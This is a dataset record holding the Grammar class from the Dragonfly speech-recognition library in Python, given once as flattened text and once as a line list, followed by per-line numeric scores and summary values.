self._enabled = True def disable(self): """ Disable this grammar so that it is not active to receive recognitions. """ self._enabled = False enabled = property(lambda self: self._enabled, doc="Whether a grammar is active to receive " "recognitions or not.") def set_exclusiveness(self, exclusive): """ Set the exclusiveness of this grammar. """ self._engine.set_exclusiveness(self, exclusive) def set_exclusive(self, exclusive): """ Alias of :meth:`set_exclusiveness`. """ self.set_exclusiveness(exclusive) def _set_engine(self, engine): if self._loaded: raise GrammarError(" Grammar %s: Cannot set engine while " "loaded." % self) self._engine = engine engine = property(lambda self: self._engine, _set_engine, doc="A grammar's SR engine.") def set_context(self, context): """ Set the context for this grammar, under which it and its rules will be active and receive recognitions if it is also enabled. Use of this method overwrites any previous context. Contexts can be modified at any time, but will only be checked when :meth:`process_begin` is called. :param context: context within which to be active. If *None*, the grammar will always be active. :type context: Context|None """ if not (isinstance(context, Context) or context is None): raise TypeError("context must be either a Context object or " "None") self._context = context context = property(lambda self: self._context, doc="A grammar's context, under which it and its " "rules will be active and receive recognitions " "if it is also enabled.") # ---------------------------------------------------------------------- # Methods for populating a grammar object instance. def add_rule(self, rule): """ Add a rule to this grammar. The following rules apply when adding rules into grammars: #. Rules **cannot** be added to grammars that are currently loaded. #. Two or more rules with the same name are **not** allowed. .. warning:: Note that while adding the same ``Rule`` object to more than one grammar is allowed, it is **not** recommended! This is because the context and active/enabled states of these rules will not function correctly if used. It is better to use *separate* ``Rule`` instances for each grammar instead. :param rule: Dragonfly rule :type rule: Rule """ self._log_load.debug("Grammar %s: adding rule %s.", self._name, rule.name) # Check for correct type and duplicate rules or rule names. if self._loaded: raise GrammarError("Cannot add rule while loaded.") elif not isinstance(rule, Rule): raise GrammarError("Invalid rule object: %s" % rule) elif rule in self._rules: return elif rule.imported: return elif [True for r in self._rules if r.name == rule.name]: raise GrammarError("Two rules with the same name '%s' not" " allowed." % rule.name) elif rule.grammar is not None and rule.exported: self._log_load.warning("Exported rule %s is already in grammar " "%s, adding it to grammar %s is not " "recommended.", rule.name, rule.grammar.name, self._name) # Append the rule to this grammar object's internal list. self._rules.append(rule) rule.grammar = self def remove_rule(self, rule): """ Remove a rule from this grammar. Rules **cannot** be removed from grammars that are currently loaded. :param rule: Dragonfly rule :type rule: Rule """ self._log_load.debug("Grammar %s: removing rule %s.", self._name, rule.name) # Check for correct type. if self._loaded: raise GrammarError("Cannot remove rule while loaded.") elif not isinstance(rule, Rule): raise GrammarError("Invalid rule object: %s" % rule) elif rule not in self._rules: return # Remove the rule from this grammar object's internal list. self._rules.remove(rule) rule.grammar = None def add_list(self, lst): """ Add a list to this grammar. Lists **cannot** be added to grammars that are currently loaded. :param lst: Dragonfly list :type lst: ListBase """ self._log_load.debug("Grammar %s: adding list %s.", self._name, lst.name) # Make sure that the list can be loaded and is not a duplicate. if self._loaded: raise GrammarError("Cannot add list while loaded.") elif not isinstance(lst, ListBase): raise GrammarError("Invalid list object: %s" % lst) for l in self._lists: if l.name == lst.name: if l is lst: # This list was already added previously, so ignore. return raise GrammarError("Two lists with the same name '%s' not" " allowed." % lst.name) # Append the list to this grammar object's internal list. self._lists.append(lst) lst.grammar = self def remove_list(self, lst): """ Remove a list from this grammar. Lists **cannot** be removed from grammars that are currently loaded. :param lst: Dragonfly list :type lst: ListBase """ self._log_load.debug("Grammar %s: removing list %s.", self._name, lst.name) # Check for correct type. if self._loaded: raise GrammarError("Cannot remove list while loaded.") elif not isinstance(lst, ListBase): raise GrammarError("Invalid list object: %s" % lst) elif lst.name not in [l.name for l in self._lists]: return # Remove the list from this grammar object's internal list. self._lists.remove(lst) lst.grammar = None def add_dependency(self, dep): """ Add a rule or list dependency to this grammar. **Internal:** this method is normally *not* called by the user, but instead automatically during grammar compilation. """ if isinstance(dep, Rule): self.add_rule(dep) elif isinstance(dep, ListBase): self.add_list(dep) else: raise GrammarError("Unknown dependency type %s." % dep) def add_all_dependencies(self): """ Iterate through the grammar's rules and add all the necessary dependencies. **Internal** This method is called when the grammar is loaded. """ memo = set() for r in self._rules: for d in r.dependencies(memo): self.add_dependency(d) # ---------------------------------------------------------------------- # Methods for runtime modification of a grammar's contents. def activate_rule(self, rule): """ Activate a rule loaded in this grammar. **Internal:** this method is normally *not* called directly by the user, but instead automatically when the rule itself is activated by the user. """ self._log_load.debug("Grammar %s: activating rule %s.", self._name, rule.name) # Check for correct type and valid rule instance. assert self._loaded assert isinstance(rule, Rule), \ "Dragonfly rule objects must be of the type dragonfly.rule.Rule" if rule not in self._rules: raise GrammarError("Rule '%s' not loaded in this grammar." % rule.name) if not rule.exported: return # Activate the given rule. self._engine.activate_rule(rule, self) def deactivate_rule(self, rule): """ Deactivate a rule loaded in this grammar. **Internal:** this method is normally *not* called directly by the user, but instead automatically when the rule itself is deactivated by the user. """ self._log_load.debug("Grammar %s: deactivating rule %s.", self._name, rule.name) # Check for correct type and valid rule instance. assert self._loaded assert isinstance(rule, Rule), \ "Dragonfly rule objects must be of the type dragonfly.rule.Rule" if rule not in self._rules: raise GrammarError("Rule '%s' not loaded in this grammar." % rule.name) if not rule.exported: return # Deactivate the given rule. self._engine.deactivate_rule(rule, self) def update_list(self, lst): """ Update a list's content loaded in this grammar. **Internal:** this method is normally *not* called directly by the user, but instead automatically when the list itself is modified by the user. """ self._log_load.debug("Grammar %s: updating list %s.", self._name, lst.name) # Check for correct type and valid list instance. # assert self._loaded if lst not in self._lists: raise GrammarError("List '%s' not loaded in this grammar." % lst.name) elif [True for w in lst.get_list_items() if not isinstance(w, string_types)]: raise GrammarError("List '%s' contains objects other than" "strings." % lst.name) self._engine.update_list(lst, self) # ---------------------------------------------------------------------- # Methods for registering a grammar object instance in natlink. def load(self): """ Load this grammar into its SR engine. """ self._log_load.debug("Grammar %s: loading into engine %s.", self._name, self._engine) # Prevent loading the same grammar multiple times. if self._loaded: return self.add_all_dependencies() self._engine.load_grammar(self) self._loaded = True self._in_context = False # Update all rules loaded in this grammar. for rule in self._rules: # Explicitly compare to False so that uninitialized rules (which # have active set to None) are activated. if rule.active is not False: rule.activate(force=True) # Update all lists loaded in this grammar. for lst in self._lists: # pylint: disable=protected-access lst._update() # self._log_load.warning(self.get_complexity_string()) def unload(self): """ Unload this grammar from its SR engine. """ # Prevent unloading the same grammar multiple times. if not self._loaded: return self._log_load.debug("Grammar %s: unloading.", self._name) self._engine.unload_grammar(self) self._loaded = False self._in_context = False def get_complexity_string(self): """ Build and return a human-readable text giving insight into the complexity of this grammar. """ rules_all = self.rules rules_top = [r for r in self.rules if r.exported] rules_imp = [r for r in self.rules if r.imported] elements = [] for rule in rules_all: elements.extend(self._get_element_list(rule)) text = ("Grammar: %3d (%3d, %3d) rules, %4d elements (%3d avg) %s" % ( len(rules_all), len(rules_top), len(rules_imp), len(elements), len(elements) / len(rules_all), self, ) ) for rule in rules_all: elements = self._get_element_list(rule) text += "\n Rule: %4d %s" % (len(elements), rule) return text def _get_element_list(self, thing): if isinstance(thing, Rule): element = thing.element else: element = thing elements = [element] for child in element.children: elements.extend(self._get_element_list(child)) return elements # ---------------------------------------------------------------------- # Callback methods for handling utterances and recognitions. def process_begin(self, executable, title, handle): """ Start of phrase callback. *Usually derived grammar classes override ``Grammar._process_begin`` instead of this method, because this method merely wraps that method adding context matching.* This method is called when the speech recognition engine detects that the user has begun to speak a phrase. Arguments: - *executable* -- the full path to the module whose window is currently in the foreground. - *title* -- window title of the foreground window. - *handle* -- window handle to the foreground window. """ # pylint: disable=expression-not-assigned self._log_begin.debug("Grammar %s: detected beginning of " "utterance.", self._name) self._log_begin.debug("Grammar %s: executable '%s', title '%s'.", self._name, executable, title) if not self._enabled: # Grammar is disabled, so deactivate all active rules. [r.deactivate() for r in self._rules if r.active] elif not self._context \ or self._context.matches(executable, title, handle): # Grammar is within context. if not self._in_context: self._in_context = True self.enter_context() self._process_begin(executable, title, handle) for r in self._rules: if r.exported and hasattr(r, "process_begin"): r.process_begin(executable, title, handle) else: # Grammar's context doesn't match, deactivate active rules. if self._in_context: self._in_context = False self.exit_context() [r.deactivate() for r in self._rules if r.active] self._log_begin.debug("Grammar %s: active rules: %s.", self._name, [r.name for r in self._rules if r.active]) def enter_context(self): """ Enter context callback. This method is called when a phrase-start has been detected. It is only called if this grammar's context previously did not match but now does match positively. """ def exit_context(self): """ Exit context callback. This method is called when a phrase-start has been detected. It is only called if this grammar's context previously did match but now doesn't match positively anymore. """ def _process_begin(self, executable, title, handle): """ Start of phrase callback. *This usually is the method which should be overridden to give derived grammar classes custom behavior.* This method is called when the speech recognition engine detects that the user has begun to speak a phrase. This method is called by the ``Grammar.process_begin`` method only if this grammar's context matches positively. Arguments: - *executable* -- the full path to the module whose window is currently in the foreground. - *title* -- window title of the foreground window. - *handle* -- window handle to the foreground window. """
[ "#\n", "# This file is part of Dragonfly.\n", "# (c) Copyright 2007, 2008 by Christo Butcher\n", "# Licensed under the LGPL.\n", "#\n", "# Dragonfly is free software: you can redistribute it and/or modify it\n", "# under the terms of the GNU Lesser General Public License as published\n", "# by the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# Dragonfly is distributed in the hope that it will be useful, but\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n", "# Lesser General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU Lesser General Public\n", "# License along with Dragonfly. If not, see\n", "# <http://www.gnu.org/licenses/>.\n", "#\n", "\n", "\"\"\"\n", "Grammar class\n", "============================================================================\n", "\n", "\"\"\"\n", "\n", "import logging\n", "from six import string_types\n", "\n", "from ..engines import get_engine\n", "from .rule_base import Rule\n", "from .list import ListBase\n", "from .context import Context\n", "from ..error import GrammarError\n", "\n", "\n", "# --------------------------------------------------------------------------\n", "\n", "class Grammar(object):\n", " \"\"\"\n", " Grammar class for managing a set of rules.\n", "\n", " This base grammar class takes care of the communication\n", " between Dragonfly's object model and the backend speech\n", " recognition engine. This includes compiling rules and\n", " elements, loading them, activating and deactivating\n", " them, and unloading them. It may, depending on the\n", " engine, also include receiving recognition results and\n", " dispatching them to the appropriate rule.\n", "\n", " - *name* -- name of this grammar\n", " - *description* (str, default: None) --\n", " description for this grammar\n", " - *context* (Context, default: None) --\n", " context within which to be active. If *None*, the grammar will\n", " always be active.\n", "\n", " \"\"\"\n", "\n", " # pylint: disable=too-many-instance-attributes\n", " _log_load = logging.getLogger(\"grammar.load\")\n", " _log_begin = logging.getLogger(\"grammar.begin\")\n", " _log_results = logging.getLogger(\"grammar.results\")\n", " _log = logging.getLogger(\"grammar\")\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for initialization and cleanup.\n", "\n", " def __init__(self, name, description=None, context=None, engine=None):\n", " self._name = name\n", " self._description = description\n", " if not (isinstance(context, Context) or context is None):\n", " raise TypeError(\"context must be either a Context object or \"\n", " \"None\")\n", " self._context = context\n", "\n", " if engine:\n", " self._engine = engine\n", " else:\n", " self._engine = get_engine()\n", "\n", " self._rules = []\n", " self._lists = []\n", " self._rule_names = None\n", " self._loaded = False\n", " self._enabled = True\n", " self._in_context = False\n", "\n", " def __del__(self):\n", " try:\n", " if self._loaded:\n", " return\n", " self.unload()\n", " except Exception as e:\n", " try:\n", " self._log.exception(\"Exception during grammar unloading:\"\n", " \" %s\", e)\n", " except Exception as e:\n", " pass\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for runtime introspection.\n", "\n", " def __repr__(self):\n", " return \"%s(%s)\" % (self.__class__.__name__, self._name)\n", "\n", " name = property(lambda self: self._name,\n", " doc=\"A grammar's name.\")\n", "\n", " rules = property(lambda self: tuple(self._rules),\n", " doc=\"List of a grammar's rules.\")\n", "\n", " active_rules = property(\n", " lambda self: [r for r in self.rules if r.active],\n", " doc=\"List of a grammar's active rules.\"\n", " )\n", "\n", " lists = property(lambda self: tuple(self._lists),\n", " doc=\"List of a grammar's lists.\")\n", "\n", " loaded = property(lambda self: self._loaded,\n", " doc=\"Whether a grammar is loaded into\"\n", " \" its SR engine or not.\")\n", "\n", " @property\n", " def rule_names(self):\n", " \"\"\"\n", " List of grammar's rule names.\n", " \"\"\"\n", " result = []\n", " for rule in self._rules:\n", " result.append(rule.name)\n", " return result\n", "\n", " def enable(self):\n", " \"\"\"\n", " Enable this grammar so that it is active to receive\n", " recognitions.\n", "\n", " \"\"\"\n", " self._enabled = True\n", "\n", " def disable(self):\n", " \"\"\"\n", " Disable this grammar so that it is not active to\n", " receive recognitions.\n", "\n", " \"\"\"\n", " self._enabled = False\n", "\n", " enabled = property(lambda self: self._enabled,\n", " doc=\"Whether a grammar is active to receive \"\n", " \"recognitions or not.\")\n", "\n", " def set_exclusiveness(self, exclusive):\n", " \"\"\" Set the exclusiveness of this grammar. \"\"\"\n", " self._engine.set_exclusiveness(self, exclusive)\n", "\n", " def set_exclusive(self, exclusive):\n", " \"\"\" Alias of :meth:`set_exclusiveness`. \"\"\"\n", " self.set_exclusiveness(exclusive)\n", "\n", " def _set_engine(self, engine):\n", " if self._loaded:\n", " raise GrammarError(\" Grammar %s: Cannot set engine while \"\n", " \"loaded.\" % self)\n", " self._engine = engine\n", "\n", " engine = property(lambda self: self._engine, _set_engine,\n", " doc=\"A grammar's SR engine.\")\n", "\n", " def set_context(self, context):\n", " \"\"\"\n", " Set the context for this grammar, under which it and its rules\n", " will be active and receive recognitions if it is also enabled.\n", "\n", " Use of this method overwrites any previous context.\n", "\n", " Contexts can be modified at any time, but will only be checked\n", " when :meth:`process_begin` is called.\n", "\n", " :param context: context within which to be active. If *None*,\n", " the grammar will always be active.\n", " :type context: Context|None\n", " \"\"\"\n", " if not (isinstance(context, Context) or context is None):\n", " raise TypeError(\"context must be either a Context object or \"\n", " \"None\")\n", " self._context = context\n", "\n", " context = property(lambda self: self._context,\n", " doc=\"A grammar's context, under which it and its \"\n", " \"rules will be active and receive recognitions \"\n", " \"if it is also enabled.\")\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for populating a grammar object instance.\n", "\n", " def add_rule(self, rule):\n", " \"\"\"\n", " Add a rule to this grammar.\n", "\n", " The following rules apply when adding rules into grammars:\n", "\n", " #. Rules **cannot** be added to grammars that are currently loaded.\n", " #. Two or more rules with the same name are **not** allowed.\n", "\n", " .. warning::\n", "\n", " Note that while adding the same ``Rule`` object to more than one\n", " grammar is allowed, it is **not** recommended! This is because\n", " the context and active/enabled states of these rules will not\n", " function correctly if used. It is better to use *separate*\n", " ``Rule`` instances for each grammar instead.\n", "\n", " :param rule: Dragonfly rule\n", " :type rule: Rule\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: adding rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and duplicate rules or rule names.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot add rule while loaded.\")\n", " elif not isinstance(rule, Rule):\n", " raise GrammarError(\"Invalid rule object: %s\" % rule)\n", " elif rule in self._rules:\n", " return\n", " elif rule.imported:\n", " return\n", " elif [True for r in self._rules if r.name == rule.name]:\n", " raise GrammarError(\"Two rules with the same name '%s' not\"\n", " \" allowed.\" % rule.name)\n", " elif rule.grammar is not None and rule.exported:\n", " self._log_load.warning(\"Exported rule %s is already in grammar \"\n", " \"%s, adding it to grammar %s is not \"\n", " \"recommended.\", rule.name,\n", " rule.grammar.name, self._name)\n", "\n", " # Append the rule to this grammar object's internal list.\n", " self._rules.append(rule)\n", " rule.grammar = self\n", "\n", " def remove_rule(self, rule):\n", " \"\"\"\n", " Remove a rule from this grammar.\n", "\n", " Rules **cannot** be removed from grammars that are currently loaded.\n", "\n", " :param rule: Dragonfly rule\n", " :type rule: Rule\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: removing rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot remove rule while loaded.\")\n", " elif not isinstance(rule, Rule):\n", " raise GrammarError(\"Invalid rule object: %s\" % rule)\n", " elif rule not in self._rules:\n", " return\n", "\n", " # Remove the rule from this grammar object's internal list.\n", " self._rules.remove(rule)\n", " rule.grammar = None\n", "\n", " def add_list(self, lst):\n", " \"\"\"\n", " Add a list to this grammar.\n", "\n", " Lists **cannot** be added to grammars that are currently loaded.\n", "\n", " :param lst: Dragonfly list\n", " :type lst: ListBase\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: adding list %s.\",\n", " self._name, lst.name)\n", "\n", " # Make sure that the list can be loaded and is not a duplicate.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot add list while loaded.\")\n", " elif not isinstance(lst, ListBase):\n", " raise GrammarError(\"Invalid list object: %s\" % lst)\n", "\n", " for l in self._lists:\n", " if l.name == lst.name:\n", " if l is lst:\n", " # This list was already added previously, so ignore.\n", " return\n", " raise GrammarError(\"Two lists with the same name '%s' not\"\n", " \" allowed.\" % lst.name)\n", "\n", " # Append the list to this grammar object's internal list.\n", " self._lists.append(lst)\n", " lst.grammar = self\n", "\n", " def remove_list(self, lst):\n", " \"\"\"\n", " Remove a list from this grammar.\n", "\n", " Lists **cannot** be removed from grammars that are currently loaded.\n", "\n", " :param lst: Dragonfly list\n", " :type lst: ListBase\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: removing list %s.\",\n", " self._name, lst.name)\n", "\n", " # Check for correct type.\n", " if self._loaded:\n", " raise GrammarError(\"Cannot remove list while loaded.\")\n", " elif not isinstance(lst, ListBase):\n", " raise GrammarError(\"Invalid list object: %s\" % lst)\n", " elif lst.name not in [l.name for l in self._lists]:\n", " return\n", "\n", " # Remove the list from this grammar object's internal list.\n", " self._lists.remove(lst)\n", " lst.grammar = None\n", "\n", " def add_dependency(self, dep):\n", " \"\"\"\n", " Add a rule or list dependency to this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " by the user, but instead automatically during\n", " grammar compilation.\n", "\n", " \"\"\"\n", " if isinstance(dep, Rule):\n", " self.add_rule(dep)\n", " elif isinstance(dep, ListBase):\n", " self.add_list(dep)\n", " else:\n", " raise GrammarError(\"Unknown dependency type %s.\" % dep)\n", "\n", " def add_all_dependencies(self):\n", " \"\"\"\n", " Iterate through the grammar's rules and add all the necessary dependencies.\n", "\n", " **Internal** This method is called when the grammar is loaded.\n", " \"\"\"\n", " memo = set()\n", " for r in self._rules:\n", " for d in r.dependencies(memo):\n", " self.add_dependency(d)\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for runtime modification of a grammar's contents.\n", "\n", " def activate_rule(self, rule):\n", " \"\"\"\n", " Activate a rule loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the rule itself is activated by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: activating rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and valid rule instance.\n", " assert self._loaded\n", " assert isinstance(rule, Rule), \\\n", " \"Dragonfly rule objects must be of the type dragonfly.rule.Rule\"\n", " if rule not in self._rules:\n", " raise GrammarError(\"Rule '%s' not loaded in this grammar.\"\n", " % rule.name)\n", " if not rule.exported:\n", " return\n", "\n", " # Activate the given rule.\n", " self._engine.activate_rule(rule, self)\n", "\n", " def deactivate_rule(self, rule):\n", " \"\"\"\n", " Deactivate a rule loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the rule itself is deactivated by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: deactivating rule %s.\",\n", " self._name, rule.name)\n", "\n", " # Check for correct type and valid rule instance.\n", " assert self._loaded\n", " assert isinstance(rule, Rule), \\\n", " \"Dragonfly rule objects must be of the type dragonfly.rule.Rule\"\n", " if rule not in self._rules:\n", " raise GrammarError(\"Rule '%s' not loaded in this grammar.\"\n", " % rule.name)\n", " if not rule.exported:\n", " return\n", "\n", " # Deactivate the given rule.\n", " self._engine.deactivate_rule(rule, self)\n", "\n", " def update_list(self, lst):\n", " \"\"\"\n", " Update a list's content loaded in this grammar.\n", "\n", " **Internal:** this method is normally *not* called\n", " directly by the user, but instead automatically when\n", " the list itself is modified by the user.\n", "\n", " \"\"\"\n", " self._log_load.debug(\"Grammar %s: updating list %s.\",\n", " self._name, lst.name)\n", "\n", " # Check for correct type and valid list instance.\n", " # assert self._loaded\n", " if lst not in self._lists:\n", " raise GrammarError(\"List '%s' not loaded in this grammar.\"\n", " % lst.name)\n", " elif [True for w in lst.get_list_items()\n", " if not isinstance(w, string_types)]:\n", " raise GrammarError(\"List '%s' contains objects other than\"\n", " \"strings.\" % lst.name)\n", "\n", " self._engine.update_list(lst, self)\n", "\n", " # ----------------------------------------------------------------------\n", " # Methods for registering a grammar object instance in natlink.\n", "\n", " def load(self):\n", " \"\"\" Load this grammar into its SR engine. \"\"\"\n", "\n", " self._log_load.debug(\"Grammar %s: loading into engine %s.\",\n", " self._name, self._engine)\n", "\n", " # Prevent loading the same grammar multiple times.\n", " if self._loaded:\n", " return\n", "\n", " self.add_all_dependencies()\n", " self._engine.load_grammar(self)\n", " self._loaded = True\n", " self._in_context = False\n", "\n", " # Update all rules loaded in this grammar.\n", " for rule in self._rules:\n", " # Explicitly compare to False so that uninitialized rules (which\n", " # have active set to None) are activated.\n", " if rule.active is not False:\n", " rule.activate(force=True)\n", " # Update all lists loaded in this grammar.\n", " for lst in self._lists:\n", " # pylint: disable=protected-access\n", " lst._update()\n", "\n", " # self._log_load.warning(self.get_complexity_string())\n", "\n", " def unload(self):\n", " \"\"\" Unload this grammar from its SR engine. \"\"\"\n", "\n", " # Prevent unloading the same grammar multiple times.\n", " if not self._loaded:\n", " return\n", " self._log_load.debug(\"Grammar %s: unloading.\", self._name)\n", "\n", " self._engine.unload_grammar(self)\n", " self._loaded = False\n", " self._in_context = False\n", "\n", " def get_complexity_string(self):\n", " \"\"\"\n", " Build and return a human-readable text giving insight into the\n", " complexity of this grammar.\n", "\n", " \"\"\"\n", " rules_all = self.rules\n", " rules_top = [r for r in self.rules if r.exported]\n", " rules_imp = [r for r in self.rules if r.imported]\n", " elements = []\n", " for rule in rules_all:\n", " elements.extend(self._get_element_list(rule))\n", " text = (\"Grammar: %3d (%3d, %3d) rules, %4d elements (%3d avg) %s\"\n", " % (\n", " len(rules_all), len(rules_top), len(rules_imp),\n", " len(elements), len(elements) / len(rules_all),\n", " self,\n", " )\n", " )\n", " for rule in rules_all:\n", " elements = self._get_element_list(rule)\n", " text += \"\\n Rule: %4d %s\" % (len(elements), rule)\n", " return text\n", "\n", " def _get_element_list(self, thing):\n", " if isinstance(thing, Rule):\n", " element = thing.element\n", " else:\n", " element = thing\n", " elements = [element]\n", " for child in element.children:\n", " elements.extend(self._get_element_list(child))\n", " return elements\n", "\n", " # ----------------------------------------------------------------------\n", " # Callback methods for handling utterances and recognitions.\n", "\n", " def process_begin(self, executable, title, handle):\n", " \"\"\"\n", " Start of phrase callback.\n", "\n", " *Usually derived grammar classes override\n", " ``Grammar._process_begin`` instead of this method, because\n", " this method merely wraps that method adding context matching.*\n", "\n", " This method is called when the speech recognition\n", " engine detects that the user has begun to speak a\n", " phrase.\n", "\n", " Arguments:\n", " - *executable* -- the full path to the module whose\n", " window is currently in the foreground.\n", " - *title* -- window title of the foreground window.\n", " - *handle* -- window handle to the foreground window.\n", "\n", " \"\"\"\n", " # pylint: disable=expression-not-assigned\n", "\n", " self._log_begin.debug(\"Grammar %s: detected beginning of \"\n", " \"utterance.\", self._name)\n", " self._log_begin.debug(\"Grammar %s: executable '%s', title '%s'.\",\n", " self._name, executable, title)\n", "\n", " if not self._enabled:\n", " # Grammar is disabled, so deactivate all active rules.\n", " [r.deactivate() for r in self._rules if r.active]\n", "\n", " elif not self._context \\\n", " or self._context.matches(executable, title, handle):\n", " # Grammar is within context.\n", " if not self._in_context:\n", " self._in_context = True\n", " self.enter_context()\n", " self._process_begin(executable, title, handle)\n", " for r in self._rules:\n", " if r.exported and hasattr(r, \"process_begin\"):\n", " r.process_begin(executable, title, handle)\n", "\n", " else:\n", " # Grammar's context doesn't match, deactivate active rules.\n", " if self._in_context:\n", " self._in_context = False\n", " self.exit_context()\n", " [r.deactivate() for r in self._rules if r.active]\n", "\n", " self._log_begin.debug(\"Grammar %s: active rules: %s.\",\n", " self._name,\n", " [r.name for r in self._rules if r.active])\n", "\n", " def enter_context(self):\n", " \"\"\"\n", " Enter context callback.\n", "\n", " This method is called when a phrase-start has been\n", " detected. It is only called if this grammar's\n", " context previously did not match but now does\n", " match positively.\n", "\n", " \"\"\"\n", "\n", " def exit_context(self):\n", " \"\"\"\n", " Exit context callback.\n", "\n", " This method is called when a phrase-start has been\n", " detected. It is only called if this grammar's\n", " context previously did match but now doesn't\n", " match positively anymore.\n", "\n", " \"\"\"\n", "\n", " def _process_begin(self, executable, title, handle):\n", " \"\"\"\n", " Start of phrase callback.\n", "\n", " *This usually is the method which should be overridden\n", " to give derived grammar classes custom behavior.*\n", "\n", " This method is called when the speech recognition\n", " engine detects that the user has begun to speak a\n", " phrase. This method is called by the\n", " ``Grammar.process_begin`` method only if this\n", " grammar's context matches positively.\n", "\n", " Arguments:\n", " - *executable* -- the full path to the module whose\n", " window is currently in the foreground.\n", " - *title* -- window title of the foreground window.\n", " - *handle* -- window handle to the foreground window.\n", "\n", " \"\"\"\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.02857142857142857, 0.02564102564102564, 0.02631578947368421, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0.01818181818181818, 0.017543859649122806, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
599
0.000441
false
